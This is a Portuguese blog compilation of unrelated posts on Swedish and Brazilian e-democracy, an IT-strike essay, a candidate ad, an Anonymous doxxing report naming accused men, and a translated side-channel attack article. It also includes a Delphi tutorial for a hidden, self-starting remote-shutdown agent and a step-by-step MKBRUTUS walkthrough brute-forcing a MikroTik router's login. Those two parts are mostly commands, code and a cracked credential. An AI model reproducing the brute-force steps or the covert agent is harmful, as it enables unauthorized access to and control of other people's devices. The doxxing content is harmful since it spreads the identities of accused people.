Demoex Democracia Experimental

Democracia experimental (Demoex[1], um partido político sueco local, é uma experiência em democracia direta eletrônica, com votações pela internet, que teve início durante um seminário denominado “TI – Tecnologia da Informação e a Democracia” realizado em Outubro de 2000 numa escola de Vallentuna, um subúrbio de Estocolmo [2].

Uma das razões de sua criação, além do desencanto generalizado com os políticos tradicionais, foi o fato de que na democracia representativa a opinião do Povo só é consultada uma vez a cada quatro anos. E após serem eleitos, os políticos tradicionais podem agir praticamente como bem entenderem até a próxima eleição [3]

As discussões que se iniciaram naquele seminário, tanto online como na vida real, levaram um grupo de estudantes e professores a fundar um partido político Demoex, sem ideologia (no significado direita-esquerda), sem plataforma, e sem sede física, e que só tinha uma promessa: a democracia direta. Esse partido concorreu às eleições municipais em Setembro de 2002, e obteve um único assento na câmara municipal de Vallentuna. Actualmente o sistema opera de forma que o representante eleito para a câmara vote de acordo com os resultados das votações online feitas pelos membros do partido.

Resultado de imagem para Demoex

Representação na câmara municipal de Vallentuna

A estudante Parisa Molagholi, então com dezenove anos, foi eleita em 4 de novembro de 2002 (com 1,7% dos votos) para a câmara municipal da cidade de Vallentuna (um subúrbio de Estocolmo), e tem causado espanto aos políticos tradicionais nos últimos anos. Molagholi, que foi reeleita em 2006 com 2,9% dos votos, é a representante do Demoex, um grupo de jovens que criou uma maneira inteiramente nova de participação na política. Molagholi não vota de acordo com suas convicções, nem de acordo com as instruções de seu partido: seu voto oficial na câmara municipal depende do resultado de uma votação online, que é realizada previamente no website do Demoex. Qualquer residente de Vallentuna que tenha completado 16 anos pode se registrar no site, e participar das votações; qualquer pessoa, de qualquer lugar do mundo, pode participar dos debates (se souber escrever em sueco).

Ideologia

Embora Demoex não assuma nenhuma posição política, ele defende uma única ideologia: ampliar a democracia nas sociedades. Demoex sustenta que a atual tecnologiadisponível já superou a política e pretende, através do uso da tecnologia da informação, criar o que se denominou de democracia líquida.

Qual é a profundidade da democracia

Adotemos uma simples análise: o número de decisões democráticas multiplicado pelo número de votantes. Em Vallentuna 20.000 eleitores votam nas eleições municipais a cada quatro anos, e 41 pessoas votam – em seu nome – outras 100 vezes/ano nos diversos temas em discussão. Em conjunto isso representa 9000 votos/ano. Agora suponhamos que, com o uso do Demoex, 60 temas sejam votados num ano, e que 1500 participantes votem em todos eles. Teríamos então 90.000 votos/ano, ou seja, dez vezes mais !

Sociedade aberta

ideologia do Demoex fundamenta-se nos princípios enumerados por Karl Popper e Henri Bergson sobre a sociedade aberta; isto é, uma visão da sociedade construída sob os princípios do acesso público às informações oficiais, em outras palavras, na “transparência”Demoex luta pela maior facilidade de acesso e de compartilhamento na política.

Distribuição estatística

Demoex usa a distribuição estatística. Isso significa que seu representante no parlamento (ou câmara) decidirá seu voto estatisticamente, como os usuários da internet. O objetivo do representante é refletir no parlamento, da forma mais fiel possível, a opinião dos membros. Suponhamos que o Demoex tenha cinco cadeiras no parlamento, e 60% dos seus membros votem a favor de uma proposta: nesse caso, três dos representantes votarão favoravelmente à proposta no parlamento. Os arredondamentos são feitos pelos critérios consagrados em matemática. Se for de todo impossível retratar, de maneira justa, a opinião dos membros numa determinada votação, adota-se o voto em branco.

O princípio da distribuição estatística é usado porque ele aperfeiçoa a democracia. Para cada questão em debate deve haver uma e apenas uma eleição democrática. A sub-divisão de um tema em várias sub-eleições cria sérios riscos de se deixar o princípio democrático fundamental da vontade da maioria de lado.

Sistema de votações complexas

Algumas votações podem requerer muito mais sofisticação que um simples sistema exclusivo de “sim” ou “não” poderia oferecer. Para resolver esses problemas são utilizados algoritmos [4]

Num dos métodos possíveis o voto pode ser -1 (não), 0 (abstenção) ou +1 (sim). No início da votação todos os eleitores são considerados como tendo votado 0, exceto quem propôs a matéria, que automaticamente é considerado como tendo votado 1. Os votos podem ser alterados até o momento da proclamação oficial dos resultados. Os votos são ligados a um avatar, o que permite que o voto seja anônimo, ao mesmo tempo em que fica assegurada a transparência, e a prestação de contas.

Cada proposta a ser votada gera um certo apoio acumulado, que é representado por um número entre -1 e +1 . No início da votação esse número é colocado em zero. Para cada dia em que haja votação, com alguma alteração no resultado de votos pró ou contra, o apoio acumulado cresce, por um valor constante. Se houver uma inversão na preferência dos eleitores entre o pró e o contra, o apoio acumulado retorna a zero.

Por esse sistema, uma proposta é considerada aprovada, ou rejeitada, quando:

(Valor corrente, chamado de “mean value” no gráfico) + (apoio acumulado) > +1 = (proposta aceita) ou < -1 = (proposta rejeitada). Clique e veja o gráfico Gráfico da votação

Usando esse algoritmo, em havendo maior participação do eleitorado, com muitos votos (em relação ao registro de eleitores), pró ou contra, sem que haja inversão da maioria durante a votação, a votação se encerra num curto espaço de tempo. Num assunto de menor interesse, com pequena participação do eleitorado, em que há poucos votos (em relação ao número de eleitores registrados), a votação se prolonga por muito mais dias.

Uma lista comparativa de diversos sistemas e métodos de votação pode ser consultada, em inglês, no verbete Voting system.

Resistência dos partidos tradicionais

Numa entrevista à Rádio Suécia, os membros do Demoex declararam que os partidos políticos tradicionais não apreciam essa experiência, porque ela coloca em questão a própria existência dos partidos representativos.

Iniciativas similares no mundo

Demoex opera de forma muito similar à Listapartecipata italiana, cujo lema é O controle do governo nas mãos do Povo (e não somente no dia das eleições).

No Brasil existe uma iniciativa similar por nome Demoex Brasil ou também Partido da Democracia Experimental Brasileiro que visa a coleta de assinaturas para obter o registro do partido político no Tribunal Superior Eleitoral. Você pode apoiar entrando no site e imprimindo a ficha de apoio, preencher a mão, assinar e enviar ao endereço que está no rodapé da folha que imprimir.

Referências

Ver também

Ligações externas

http://www.cidadaos.org.br – Partido político baseado no DEMOEX (em desenvolvimento)

Bibliografia

Barber, Benjamin R., 1984, Strong democracy: Participatory Politics for a New Age, University of California Press, Berkley, CA.

Dahl, Robert A., 1985, A preface to Economic Democracy, Polity Press, Oxford.

Grönlund, Åke, 2001, IT, demokrati och medborgarnas deltagande, VINNOVA Rapport VR 2001:26 och TELDOK Rapport 142. TELDOK/VINNOVA, Stockholm.

Habermas, Jürgen, 1996, Between Facts and Norms, Polity Press, Cambridge.

Ilshammar, Lars, 2002, Offentlighetens nya rum – Teknik och politik i Sverige 1969–1999, Universitetsbiblioteket, Örebro

Kvale, Steinar, 1997, Den kvalitativa forskningsintervjun, Studentlitteratur, Lund. Torpe, Lars, 2002, Demokrati på nettet – status og perspektiver for digitalkommunikation i kommunerna, paper till den XIII Nordiske Statskunskabskongres, Aalborg Universitet, 15-16 Augusti 2002. Besökt 2003-03-15

NORBACK, Per. Demoex – think global, act local. Vallentuna, Suécia: The Utopian World Championship 2004.

Olsson, Anders R., 1999, Elektronisk demokrati, Demokratiutredningens skriftserie nr. 16, SOU 1999:12, Fakta info direkt, Stockholm.

Olsson, Anders R., 2001, E-röstning: En lägesrapport, IT-kommissionen, Observatoriet för IT, demokrati och medborgarskap, Observatorierapport 35/2001, IT-kommissionen, Stockholm.

Ottesen, Karin, 2003, IT-stöd för demokratiska processer – med inriktning på innehållen funktionalitet och faktisk användning, Institutionen för informationsteknologi och medier, Mitthögskolan, Sundsvall.

Democracia virtual

A ideia de democracia virtual (muitas vezes também referenciada como democracia digital, e-democracy ou ciberdemocracia) se relaciona aos meios e modos de utilização das ferramentas de comunicação digital para incrementar as práticas políticas. O estudo e o desenvolvimento de iniciativas ligadas a valores tais como participação, transparência, preservação de direitos e liberdades, dentre outros, deu origem a toda uma literatura nacional e internacional dedicada ao tema.

 

democracia virtual ou e-democracia é mais comumente compreendida em sua interface relativa à interação entre sistema político e cidadãos, seja por meio da participação direta, seja pelo estímulo à realização de debates entre o governo e a população através da internet. Na Europa e nos Estados Unidos, o uso da Internet e outras redes de computador no sector público acenderam um debate sobre formas novas da democracia. Análises deste estudo, como o uso de tecnologias da Internet por governos, com o fornecimento de serviços e interação com os cidadãos – também chamado e-governo – contribui para o realce da democracia.

Entretanto, em nenhum outro ponto na história uma tecnologia de comunicações teve um impacto tão rápido e largo na sociedade como a internet. Ao contrário dos meios precedentes, a Internet representa uma ferramenta democrática inovadora, porque permite que os povos interajam diretamente com a informação que lhes é apresentada, não obstante os limites geográficos.

Os cidadãos, pela primeira vez na história, podem comunicar-se com as autoridades do governo mais livremente, associando-se com grupos de interesse mais facilmente, votam online, e (logo) podem participar ativamente em todos os estágios do processo de decisão: avaliação das necessidades, recolha da informação, fazer exame de decisão, avaliação e correção das ações.

Assim, a rede tem um número de potenciais democráticos, incluindo:

  • Interatividade
  • Exatidão ao ponto e às modalidades não-hierárquicas de uma comunicação
  • Custos baixos para os utilizadores
  • Rapidez como um meio de comunicação
  • Não limitação geográfica
  • Capacidade (parcial) de manter o anonimato.

A informação é “o material cru” de uma sociedade democrática e a Internet pode promover a disseminação da informação, ao mesmo tempo que aumenta a participação do cidadão.

Entretanto, a Internet não pode ser considerada como uma solução para o deficit democrático de hoje, mas apenas como uma ferramenta que possa de forma inteligente, ser usada para realçar a democracia e a participação do cidadão.

Na democracia-virtual o poder representativo é abolido; assim sendo, todas as leis são aprovadas diretamente pelos cidadãos (utilizando os meios tecnológicos ao dispor: internet, caixas de banca automática e outros); deixando o parlamento de existir como órgão legislativo.

Este método realça através das novas tecnologias a velha democracia, sem restrições de local, de condições sociais, e resistindo de um modo muito eficaz a tentativas oligárquicas.

No Brasil

Câmara dos Deputados

e-Democracia

O Projeto e-Democracia é uma espécie de comunidade virtual que visa catalisar opiniões, sugestões, posicionamentos políticos e críticas aos projetos de lei e outras proposições legislativas em trâmite na Câmara dos Deputados brasileira. Há vários trabalhos brasileiros que examinam esta experiência, seja ao enfatizar os efeitos da participação dos cidadãos através do Portal, seja ao analisar o caráter da deliberação pública percebida em tal iniciativa[3]. Registre-se que Câmata dos Deputados é um dos órgãos pioneiros do Estado brasileiro a promover ferramentas de participação e transparência[4].

Wikilegis

Com base na filosofia wiki da Wikipédia, a Câmara dos Deputados do Brasil desenvolveu o conceito de Wikilégis dentro do portal e-Democracia, uma ferramenta digital que permite a realização de trabalho colaborativo na construção da lei. Assim, o cidadão poderá apresentar sugestões diretamente no texto de forma colaborativa com outros usuários.

Obviamente que tal mecanismo tem o escopo de facilitar a participação objetiva e responsável, ou seja, o cidadão dá sua opinião, já evidenciando a forma de concretizar sua idéia em algo legalmente viável. Assim, o cidadão pode apresentar sugestões de emendas ao texto, ou mesmo elaborar o seu próprio projeto com a ajuda de outras pessoas.

O objetivo do Wikilégis é estimular a busca pelo consenso na construção da lei. A participação popular não precisa (e talvez não deva) gerar a formulação da lei propriamente dita e sim promover elementos para sua construção.

Um dos exemplos de aplicação do Wikilégis é a experiência de comunidades virtuais legislativas geradas pelo Projeto e-Democracia da Câmara dos Deputados brasileira.

Senado Federal

Portal e-Cidadania

Senado Federal também criou a sua ferramenta de participação, o Portal e-Cidadania. Criado em 2012, o Portal é uma ferramenta isenta de qualquer ligação com partidos políticos, que tem como objetivo a participação cidadã de forma mais direta e efetiva do processo legislativo. Desde sua criação até fevereiro de 2018, mais de 45 milhões de pessoas já haviam acessado o Portal.  Apenas em 2017 o site contabilizou mais de 130,5 milhões de acessos por mais de 21 milhões de usuários.[5][6]

Existem três ferramentas de participação disponíveis no e-Cidadania, que são:

Ideia Legislativa

Qualquer pessoa pode enviar Ideias Legislativas para criar novas leis ou alterar as leis atuais. Todas as Ideias enviadas passam por moderação. Se estiverem de acordo, são publicadas e abertas para receberem apoios durante 4 meses. Para tramitar na casa, as ideias precisam atingir durante esse período 20 mil apoios e então são formalizadas como Sugestões Legislativas (SUG) e enviadas para a Comissão de Direitos Humanos E Legislação Participativa (CDH)onde são debatidas pelos senadores e recebem parecer.[7]

Evento Interativo

Os eventos interativos compreendem audiências públicas, sabatinas, seminários, sessões de debate temático e outras reuniões. O cidadão pode participar, enviando comentários e perguntas que são entregues para os senadores durante as reuniões.

Consulta Pública

Todas as proposições que tramitam no Senado ficam disponíveis durante sua tramitação para receber opiniões do público, favoráveis ou contra os projetos. Quase 11 milhões de votos foram registrados nas Proposições que tramitam no Senado.[8]

Interlegis

Interlegis é um programa do Estado Brasileiro, financiado pelo BID (Banco Interamericano de Desenvolvimento) e administrado pelo Senado Federal desde 1997, que tem o objetivo de modernizar e integrar o Legislativo Brasileiro para permitir a participação cidadã e preparar a tecnologia das Casas Legislativas para a e-democracia.

Programa Interlegis desenvolve várias tecnologias para o poder legislativo, todas liberadas como software livre sob a licença de uso GPL e que são desenvolvidas em conjunto com comunidades de usuários e cidadãos interessados, apoiadas pelo ambiente Colab. Dentre os principais sistemas estão: SAPL – Sistema de Apoio ao Processo Legislativo – que visa a automação do processo legislativo eletrônico; SAAP – Sistema de Apoio à Atividade Parlamentar – que visa a automação do gabinete dos parlamentares; SPDO – Sistema de Protocolo de Documentos – que visa a automação da tramitação de documentos protocolados na instituição; Portal Modelo – que é um portal CMS pronto para uso e customizado para uma Casa Legislativa, com ferramentas de transparêncialei de acesso à informação, participação cidadã, dados abertos, e-democracia, entre outras.

O Colab, desenvolvido e mantido pelo Interlegis, é um ambiente de colaboração para as comunidades de prática do legislativo, que possui ferramentas para estimular a participação de cidadãos, funcionários das Casas Legislativas e Parlamentares. Ele está sendo utilizado para o desenvolvimento da nova versão do Portal do Software Público Brasileiro
.

E se os “menino(a)s da informática” resolvessem parar?


Com todo o respeito à classe dos caminhoneiros que, durante os últimos 8 dias de paralisação mostraram o quão frágil é nossa estrutura governamental e de logística e o quão forte e importante é a categoria, tenho que confessar que isso me provocou certos devaneios e trouxe à tona uma outra questão:

E se nós, profissionais de TI, ou “menino(a)s da informática”, resolvêssemos parar?

A ideia é simples, mas, como tudo em nossa área, segue um algoritmo lógico. Não faríamos bloqueios em vias públicas, não sairíamos às ruas com cartazes e caras pintadas, entoando palavras de ordem, não bateríamos panelas e nem vandalizaríamos nenhum estabelecimento público ou privado, apenas ficaríamos em casa, no aconchego de nossas camas e, o mais importante, com os telefones e computadores desligados.

Como? Meu algoritmo talvez tenha bugs, por isso, conclamo a todos um crowdsourcing.

1º Dia:
O Suporte Técnico não estaria lá para trocar computador de lugar, substituir um monitor ou mouse com defeito, fazer ou restaurar um backup, atualizar antivírus, instalar um programa “essencial”. Wi-fi lenta? Vai ler um livro! Desatolar papel ou trocar o tonner da impressora, ajudar aquele usuário que, apesar de trabalhar com o Word há 10 anos, não sabe formatar um texto, corrigir o problema do celular daquele cara que acha que manja tudo e baixou um app novo que viu no Facebook e agora tá travando ou que formatou seu computador pessoal e agora quer o “crack” do Windows ou do Office. Essas são situações que só o valente guerreiro que está na linha de frente conhece. Pronto, 40% das estações de trabalho das empresas e particulares absolutamente inutilizadas.

2º Dia:
A “Informática” já toma evidência e começa a fazer parte das rodas de conversa no cafezinho. Agora é a vez dos bravos Analistas de Sistemas e Gestores de Banco de Dados, deixando de lado os roolbacks de documentos ou informação inserida indevidamente no sistema. Sabe aquele botãozinho que o usuário quer tanto que se coloque em uma tela? E daí? E aquele acesso privilegiado que o Diretor insiste que sua estagiária tenha, nem pensar. Sem contar aquela dúvida que vem à tona pela milésima vez sobre em qual campo inserir determinada informação ou aquele prazo vital para entregar determinada parte do projeto, ficou pra depois. Pronto, mais 30% dos postos de trabalho e 70% dos projetos totalmente parados.

3º Dia:
A cereja do bolo, o estabelecimento do Caos e uma provável Guerra Civil, tem como protagonista os Administradores de Redes. Sim, aquele que muita gente nem sabe que existe e para que serve. Esses sim terão que levantar de suas camas, caminhar, ainda de pijamas até o seu notebook, acessar remotamente seus servidores e apenas digitar um comando: Shutdown -s now!

Haverá combustível nas bombas, remédios nos hospitais, comida nas prateleiras dos mercados, merenda nas escolas, mas…..

Deixo a cargo de cada um dos profissionais estabelecerem o tamanho do caos proporcionado que, aliás, nem será noticiado pelas TVs, pois, afinal, sem computadores, redes e internet, como veicularão qualquer tipo de informação? Ah, e não adianta nada mandarem o Exército atrás de nós, pois, afinal, estamos quietos em nossas casas, dormindo com as luzes apagadas por que o setor elétrico não funciona sem computador, apenas isso.

Quanto às reivindicações, além das básicas como melhores condições salariais e de trabalho, reconhecimento da nossa atividade como vital para o funcionamento de um mundo altamente automatizado, etc, poderíamos pedir o que desejarmos:

uma máquina de café só nossa;
o direito de mandar para onde quisermos aqueles que nos chamam de “garotos da informática”,;
folgas no final de semana;
o direito de ir a um churrasco de família sem sermos molestados por perguntas idiotas;
dentre outras várias.
Sim, realmente todas as categorias tem seu valor e sua importância na grande máquina que é a sociedade e que, quando uma engrenagem para, toda a máquina sente. Mas, certamente, no mundo de hoje a chave de on-off para essa engrenagem rodar são os “meninos da informática“.

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista

Mr Claytonet 20666

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista
http;//mrclaytonet.vereador.site
Pelo progresso de nossa cidade chega de ser ultrapassado por outras cidades mineiras em desenvolvimento, chega de atraso. Sou Barbacenense a vida toda e nunca vejo nossa cidade progredir ta na hora de ter alguem que realmente não tem medo de lutar pelo progresso e o povo na camara municipal de Barbacena essa pessoa sou eu Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista.
http://mrclaytonet.vereador.site
Assista este video:https://www.facebook.com/mrclaytonet/videos/1400996586582682/?hc_location=ufi

Porque escolhi o numero 20666?
Por causa do Route 66 MC 🙂

Delphi: Como criar um gerenciador para sua rede

Para criarmos um programa que “gerencie” a nossa rede, seja tanto em caso como no trabalho, temos que criar dois programas: um programa servidor, que ficará nas máquinas que queremos controlar; e um programa cliente, que irá rodar na máquina que queremos usar para controlar os outros computadores.

Primeiramente, devemos criar o programa servidor. Nele colocaremos os componentes ClientSocket (Internet) e NMMsgServ (FastNet). Logo após iremos clicar no menu Project/View Source. Nos será mostrado o código base da aplicação. Devemos colocar o seguinte comando após o begin:

Application.ShowMainForm:=False;

Isso serve para que quando a aplicação seja iniciada, ela não mostre o form principal, ficando invisível ao usuário que estará utilizando o computador. Depois, devemos mudar a propriedade Port do componente NMMsgServ para a porta que você quiser, ou deixar com está (6711). Você deve mudar se existir outro programa usando esta porta ou um firewall bloqueando-a. No meu caso, deixei como 6711.

Agora, no evento OnMSG, devemos colocar o que o programa deve fazer quando receber determinada mensagem. Nesse exemplo, ao receber a mensagem “desligar”, ele irá desligar o computador. Colocarei o comando que é usado para desligar o Windows 98, mas você pode perfeitamente colocar aquela procedure que server para desligar qualquer Windows, só não coloco aqui porque ela é muito grande.

if sMsg = “desligar” then
begin
WinExec(“C:\Windows\rundll32.exe user.exe,exitwindows”,sw_hide);
end;

Ou seja, quando a mensagem “desligar” for enviada para o programa ele irá desligar o Windows 98. Você pode fazer isso e colocar um else depois e fazer com que o programa aceite outros comandos, como por exemplo:

if sMsg = “desligar” then
begin
WinExec(“C:\Windows\rundll32.exe user.exe,exitwindows”,sw_hide);
end
else
if sMsg = “monitor” then
begin
DesligaMonitor(True);
end;

Então ele irá desligar o monitor quando receber a mensagem “monitor”. Claro que do jeito que está neste exemplo, a procedure DesligaMonitor deve estar declarada antes.

Depois de colocar todas as suas funções e procedures, você pode colocar no evento OnCreate do form, um procedure que coloque seu programa no registro para iniciar junto com o Windows ou pode colocar ele como uma tarefa agendada do Windows, para que ele inicie com o Windows.

Agora, temos que criar o programa cliente, para que possamos gerenciar nossos computadores. Crie uma nova aplicação, com os componentes ClientSocket (Internet) e NMMsg (FastNet). Não esqueça de mudar a porta para a que você configurou no servidor. Se você não mudou no servidor, também não precisa mudar no cliente, pois já vai estar com 6711. Agora, coloque um Edit, um Label e um Button. No Caption do Label, coloque “Host” e no Caption do Button coloque “Conectar”. No botão Conectar, coloque o seguinte código:

procedure TForm1.Button1Click(Sender: TObject);
var
comp:string;
begin
comp:=Edit1.Text;
NMMsg1.Host:=comp;
try
NMMsg1.Connect;
ShowMessage(“Conectado.”);
except
ShowMessage(“Erro ao Conectar.”);
end;
end;

Para funcionar, você deve colocar o IP ou o nome de Host do computador que quer controlar e depois clicar em “Conectar”. Se a conexão for possível, irá aparecer uma mensagem dizendo “Conectado”, caso contrário irá dar erro. Agora estou conectado e daí? Agora, vamos colocar um outro botão e alterar o seu Caption para “Desligar”. No código do botão, coloque:

if NMMsg1.Connected=True then
NMMsg1.Disconnect;
NMMsg1.PostIt(“desligar”);
NMMsg1.Connect;

Ou seja, quando você conectar e clicar em “desligar”, o computador a que você está conectado irá desligar. Podemos colocar outro botão com o código e trocar o “desligar” por “monitor”, então o monitor do computador seria desligado.

Outra coisa interessante é que podemos fazer um cliente mais aperfeiçoado, por exemplo, que mande estes comandos para uma faixa de IPs e assim, desligar vários computadores ou desligar os monitores de todos eles. Isso é interessante em empresas ou até mesmo em casa quando se quer enconomizar um pouco de energia e configurar o programa para que mande o comando de desligar o monitor para todos os computadores na rede ao meio-dia, para economizar na energia gasta por eles e configurar para que no fim no expediente (as 7:00 por exemplo), ele mande o comando de desligar o computador para os PCs da rede, evitando que algum fique ligado e que alguém tenha que ver se todos estão desligados, poupando energia e esforços.

Logo SDCX

Anonymous divulga dados de estupradores de menina no Rio de Janeiro

Anonymous

Além das milhares de mensagens em apoio à jovem vítima de estupro coletivo na Zona Oeste do Rio de Janeiro no penúltimo sábado (21), agora o grupo de hackers Anonymous mobilizou uma campanha para buscar e expor os nomes dos 33 homens que participaram do crime. Em uma mensagem no Pastebin, serviço que permite publicar fragmentos de textos por um período ou por tempo indeterminado, o AnonOpsBrazil anunciou que vai divulgar dados de todos os envolvidos na barbárie que chocou o país nesta semana. Segundo os hackers, as informações serão postadas conforme o grupo identificar os criminosos e somente depois que o Ministério Público receber uma denúncia formal pelos policiais que estão investigando o caso. Um dos nomes divulgados pelo grupo é o de Raphael Asssis Duarte Belo, de 41 anos. Ele é o rapaz que apareceu fazendo uma selfie ao lado do corpo da adolescente de 16 anos e que foi amplamente compartilhado nas redes sociais na última terça-feira (24). Entre os dados publicados estão o nome, a idade e o estado civil dos acusados. “Estamos com mais dados em relação a ele, mas, esses dados serão entregue para as autoridades na ajuda pra localizar o estuprador. Sim, tomamos toda cautela para confirmar a identidade dele”, comentaram os hackers no comunicado, reforçando a afirmação de que tomaram cuidado para não expor nenhuma pessoa inocente. Além de Raphael, a polícia já identificou outros três homens e decretou a prisão preventiva dos quatro.

São eles Lucas Perdomo Duarte Santos, de 20 anos, com quem a menina tinha um relacionamento há três anos; Marcelo Miranda da Cruz Correa, de 18 anos; e Michel Brazil da Silva, de 20.

Veja abaixo a carta divulgada pelos hackers do Anonymous Brasil: “‘Estupradores não são doentes: são filhos saudáveis do patriarcado.’ A sociedade e o machismo impregnado nela agem muitas vezes de maneira silenciosa. Pessoas banalizam o tempo inteiro e acabam por aceitar sua naturalizacão, costumeiramente atribuindo a culpa às vítimas das opressões. Uma sociedade doente, gera pessoas doentes, assim como o caso do Rafael, que divulgou e achou graça da desgraça e covardia extrema a qual cometeu com uma jovem, ainda por cima menor de idade, junto com mais cerca de 30 homens. A exposição desta figura é muito importante para que se possa facilitar a sua localização junto às autoridades competentes, para que possam dessa maneira localizar ainda os demais envolvidos nessa barbárie.Não há, infelizmente, justiça que repare a dor e o trauma sofridos, porém, há a urgente necessidade de que indivíduos como estes não continuem soltos junto à sociedade. Pedimos que compartilhem para que possamos dessa maneira localizar e, quem sabe dessa maneira, possamos assistir ao mínimo de justiça possível dentro de uma sociedade que se despreocupa com a criação de monstros como estes. Estamos com mais dados em relação a ele, mas, esses dados serão entregue para as autoridades na ajuda pra localizar o estuprador. Sim, tomamos toda cautela para confirmar a identidade dele.”

Fontes: Anonymous Brasil (Facebook), Pastebin via Catraca Livre

 

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

BRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Veja o ataque na pratica:
01 Passo

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Verifique a versão atual do python em seguida realiza a instalação da versão 3

root@kali:~# python –version (Exibe a versão do Python)

root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

02 Passo

Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.

root@kali:~# python –version (Exibe a versão do Python)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

03 Passo

Realize o download do projeto mkbrutus

root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

04 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~# chmod -R 755 mkbrutus/

root@kali:~# cd mkbrutus/

root@kali:~/mkbrutus# ls -l

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

05 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~/mkbrutus# python3 mkbrutus.py -h

-h : Help (Ajuda)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

06 Passo

São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

07 Passo

Crie um arquivo de senhas ou realize o download de uma lista nos sites:

Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net

root@kali:~/mkbrutus# cat senhas.txt

 

Conteúdo do arquivo senhas.txt

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

08 Passo

Realize o ataque no equipamento utilizando os seguintes parâmetros.

root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt

  • mkbrutus.py : Ferramenta de Brute Force
  • 192.168.0.1 : IP do Roteador MikroTik
  • senhas.txt : Arquivo de Senhas(Wordlist)

O ataque é realizado com sucesso e o usuário e a senha são revelados:

Usuário: admin
Senha: P@ssw0rd

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Desenvolvedores:

Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa

Projeto: github.com/mkbrutusproject/mkbrutus

Fonte: 100security

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Este artigo demonstra ao público em geral que existem formas de ataque que podem ser feitas aos algoritmos criptográficos que fogem do aspecto matemático, puro e simples.

O artigo, escrito originalmente por WILLIAM BUCHANAN da Napier University, demonstra de forma inequívoca que, algoritmos supostamente seguros podem, de fato, serem atacado por métodos não convencionais – mas científicos porcerto – numa linguagem simples e acessível a todos.

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Abaixo, segue uma tradução livre feita por mim deste artigo (respeitando ao máximo o conteúdo original), preservando também as imagens que Prof.Buchanan pôs

Ao final, todos os links que embasam o artigo.


Agora a Criptografia pode ser Quebrada através das Paredes

A quebra de chaves de criptografia tem envolvido frequentemente métodos de força bruta, ou falhas de segmentação em sua implementação. Há, porém, o interesse crescente em ataques físicos indiretos  (nota: no original, Physical Side-Channel Attacks), onde há um vazamento não-intencional de informações da criptografia, tais como de radiação eletromagnética, consumo de energia, flutuações de tensão elétrica e variações do mesmo som e térmicas.

Poucas empresas atualmente protegem seus dispositivos contra ataques indiretos, especialmente se se provassem dispendiosos, e exigem extensos testes com equipamentos complexos.

Dispositivos também estão se tornando mais rápidos, e, naturalmente deles, são propensos a emitir uma quantidade crescente de emissões de rádio e eletromagnética (EM). Um processador de 2GHz, por exemplo, está rodando por volta da mesma frequência que nossos sinais de Wi-Fi (2.4 GHz), e muitas vezes os chips não são protegidos contra emissões de ondas de rádio que são um subproduto natural da operação rápida do dispositivo. Nessas altas freqüências, é geralmente difícil impedir emissões de EM para fios nas proximidades e em outros circuitos.

Ataques por Canais Laterais

Tem havido trabalhos sobre a quebra do algoritmo RSA com métodos acústicos, juntamente com variações eletromagnéticas e de tensão. Agora, os pesquisadores tomaram um significativo passo à frente, conforme documento “ECDH Key-Extraction via Low-Bandwidth Electromagnetic Attacks on PCs” (Ataques de Extração de chaves ECDH via Eletromagnetismo de Baixa-Frequência em PC’s).

Dentro deste documento, os autores descrevem a quebra do ECDH (Curva Elíptica Diffie-Hellman), que é um dos mais populares métodos de troca de chaves e é muitas vezes usado ao se conectar a sites como Microsoft Live, Google e Facebook.

No trabalho eles atacam o algoritmo de criptografia de chave pública ECDH e medem as mudanças eletromagnéticas. Este ataque usa um método “texto codificado escolhido” (nota: Choosen Ciphertext Attack, um método bastante conhecido há décadas), e uma técnica de análise de tempo-freqüência de sinal, de forma a quebrar a chave. Isso revela a chave de descriptografia em poucos segundos, vinda de uma antena em outra sala.

ECDH é agora um método popular, e é basicamente o método de troca de chaves Diffie-Hellman com o uso de métodos de Curva Elíptica:

(Nota: veja aqui uma explicação sobre Curva Elíptica)

Análise de Tensão

O trabalho de modulação em trilhas dos chips é bem documentado, para descobrimento das chaves de criptografia, onde a segurança e a proteção da chave é reduzida. Também houve trabalho sobre um “cold boot” onde os chips de memória são “congelados”, mantendo seus estados de informação/bit:

Análise Diferencial de Alimentação em cartões SIM

Até agora, todos pensamos que cartões SIM estavam seguros da maioria dos tipos de ataque.

